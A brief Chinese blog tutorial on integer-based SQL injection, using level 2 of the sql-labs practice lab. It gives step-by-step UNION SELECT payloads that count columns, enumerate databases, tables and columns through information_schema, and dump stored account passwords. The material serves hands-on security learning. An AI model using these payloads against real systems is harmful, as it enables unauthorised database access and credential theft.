前几天写了一个文章结果。。。。。
今天开始我们一起学sql注入 ,学习之前需要大家已经搭建完sql-labs、
sql注入整形注入
sql注入的三要素都有什么?
进入sql-labs
选择第二关
order by 3
探测注入点
页面正常的话继续执行下面
这句话的含义就是看有多少个返回值
union select 1,2,3 %23
判断注入点在什么位置
随后查询所有数据库
union select 1,group_concat(schema_name),3 from information_schema.schemata
结果为所有的数据库名称
查询某个数据库中所有的表名
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database()
结果为当前数据库中所有的表名
查询某个数据库中所有的列名
id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='得到的表名'
结果为当前数据库中所有的列名
得到表名列名后即可开始查询数据
id=-1 union select 1,(得到的列名),(得到的列名) from 列名在那个表里就写那个表名
然后就可以得到数据
得到的数据为数据库的账号密码